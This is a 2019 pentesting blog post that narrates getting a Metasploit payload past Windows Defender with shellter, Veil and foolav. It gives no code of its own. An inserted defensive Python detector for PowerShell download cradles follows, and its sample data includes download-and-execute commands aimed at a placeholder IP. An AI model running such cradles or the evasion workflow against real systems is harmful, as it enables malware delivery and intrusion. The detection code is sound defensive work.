Tuesday, 5 November 2019

Fool-AV-riend - Windows 10


A few days ago I was reading one of the tutorials related to 'pentesting AD'. They are all pretty cool. You can learn a lot from the content presented by the authors. But my question is...

... why do (almost ;)) all of them start from the moment "when you already have an admin account"? What if I don't have an admin account and I'm still 'only' at the beginning of the road to getting it (read as: 'I found an RCE, but how do I store my payload there to move forward')?

During my super-lab exercises I found that on a 'default installation of a Windows VM' (when downloading some payload EXE) you will get an alert from Windows Defender. I would like to avoid it during normal day-to-day pentests, so I decided to use "Leonardo's technique":


My first guess was the shellter tool from Kali:

Installing, preparing and checking the payload from msf, then starting a Python HTTP server (python -m) to download it:

And here we are, trying to run the PS1 to get our new calc.exe:

Good god! There is a real Defender to protect us!


Well. Trying something else...

Hm. Still 'not the response I'm looking for'. :) So I decided to do a hardcore update and install Veil:

Uh. ;Z A few more MBs for our Kali - but I hope it will help. Checking:

Go Veil, "you can do it!":

So. :]

At this moment I knew I needed some solution that would solve the case here. I had wasted a lot of time, so now it's time for foolav ;] (after a small talk with "one of the colleagues" I decided to check this code - and to be honest - this is what I was looking for):

Let's try it!

Preparing Metasploit - according to the README:

Checking:

I downloaded our EXE file using PS1:

Checking the listener on the Kali VM:

Ok, so I received a connection but there was no shell. :S Checking:

More details using sessions -l:

Ok, so probably (during encoding) some part of the shellcode was changed. I tried to use a more 'normal payload' to verify my results (I used cmd=calc.exe). You will find the results below:

In case of our "last example" - maybe you will find it useful. ;)
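The screenshots in this post show the attacker side of the download step: the EXE is served from a Python HTTP server on the Kali VM and fetched with a PowerShell one-liner. As an added example that is not the author's code, here is the defender's view of that same step: a small scorer over PowerShell script-block text (the payload of Event ID 4104 records in the Microsoft-Windows-PowerShell/Operational log) that flags a download-and-execute cradle. The script-block samples are constructed for this example, the 192.0.2.x addresses are documentation-range placeholders, and the trait weights and threshold are assumptions, not a published detection rule.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed sample PowerShell script-block texts (the kind of content found in
# Event ID 4104 records); they are NOT taken from the post. The 192.0.2.0/24
# addresses are documentation-range placeholders.
SAMPLE_SCRIPT_BLOCKS = [
    "$c = New-Object System.Net.WebClient; "
    "$c.DownloadFile('http://192.0.2.10:8000/payload.exe', 'C:\\Users\\Public\\payload.exe'); "
    "Start-Process 'C:\\Users\\Public\\payload.exe'",
    "Invoke-WebRequest -Uri http://192.0.2.10:8000/calc.exe -OutFile $env:TEMP\\calc.exe; & $env:TEMP\\calc.exe",
    "Get-ChildItem C:\\Windows\\System32 | Where-Object { $_.Length -gt 1MB }",
    "Invoke-WebRequest -Uri https://www.example.com/readme.txt -OutFile readme.txt",
]

# Download primitives commonly used from PowerShell (word-bounded so they do not
# match inside unrelated identifiers).
DOWNLOAD_RE = re.compile(
    r"\b(DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|iwr|wget|curl|Start-BitsTransfer)\b",
    re.IGNORECASE,
)
# Ways the fetched file could be launched from the same block.
EXEC_RE = re.compile(
    r"(\bStart-Process\b|\bInvoke-Expression\b|\biex\b|&\s*\S+\.exe\b)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"(https?)://([^/\s'\"]+)(/[^\s'\"]*)?", re.IGNORECASE)
IP_LITERAL_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?")


@dataclass
class Finding:
    index: int                 # position of the block in the input list
    score: int                 # number of suspicious traits observed
    reasons: List[str] = field(default_factory=list)


def score_block(block: str) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one script block. Each trait adds one point;
    the equal weights are an assumption of this example, not a published rule."""
    reasons: List[str] = []
    if DOWNLOAD_RE.search(block):
        reasons.append("download primitive")
    url = URL_RE.search(block)
    if url:
        scheme, host, path = url.group(1).lower(), url.group(2), url.group(3) or ""
        if scheme == "http":
            reasons.append("cleartext http")
        if IP_LITERAL_RE.fullmatch(host):
            reasons.append("ip-literal host")
        if path.lower().endswith(".exe"):
            reasons.append("executable download")
    if EXEC_RE.search(block):
        reasons.append("execution in same block")
    return len(reasons), reasons


def find_download_cradles(blocks: List[str], threshold: int = 4) -> List[Finding]:
    """Flag blocks whose score reaches the threshold (4 of the 5 traits by default)."""
    findings = []
    for i, block in enumerate(blocks):
        score, reasons = score_block(block)
        if score >= threshold:
            findings.append(Finding(i, score, reasons))
    return findings


if __name__ == "__main__":
    for f in find_download_cradles(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.index}: score {f.score} ({', '.join(f.reasons)})")
```

Only the two cradle-style blocks reach the default threshold; the plain Get-ChildItem line scores 0 and the HTTPS text download scores 1. Lowering the threshold trades precision for recall (admin scripts that pull installers over HTTP will start to show up), so in practice this kind of scoring is paired with process-creation telemetry for the launched binary rather than used on its own.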

See you next time!

Cheers